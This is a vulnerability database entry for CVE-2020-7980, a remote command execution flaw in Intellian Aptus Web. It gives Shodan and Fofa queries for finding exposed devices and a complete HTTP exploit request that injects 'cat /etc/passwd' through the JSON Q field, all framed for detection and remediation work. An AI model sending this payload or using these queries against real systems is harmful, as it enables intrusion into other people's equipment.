🔙 목록으로 돌아가기

CVE-2020-7980: Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution

TitleSatellian Intellian Aptus Web <= 1.24 - Remote Command Execution
Authorritikchaddha
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
RemediationUpgrade to a patched version of Satellian Intellian Aptus Web (version > 1.24).
CVSS Score9.8
EPSS Score0.93932
CVE IDCVE-2020-7980
CWE IDCWE-78
Shodan Queryhttp.title:"Intellian Aptus Web"http.title:"intellian aptus web"
Fofa Querytitle="intellian aptus web"
Tags cve2020 cve intellian aptus packetstorm satellian rce intelliantech vkev vuln

🔍 Vulnerability Description

Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.

🌐 HTTP Request

POST /cgi-bin/libagent.cgi?type=J HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Connection: close
Content-Length: 105
Content-Type: application/json
Cookie: ctr_t=0; sid=123456789
Accept-Encoding: gzip

{"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "cat /etc/passwd", "F": "EXEC_CMD"}, "V_": 1}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-7980.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-7980.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A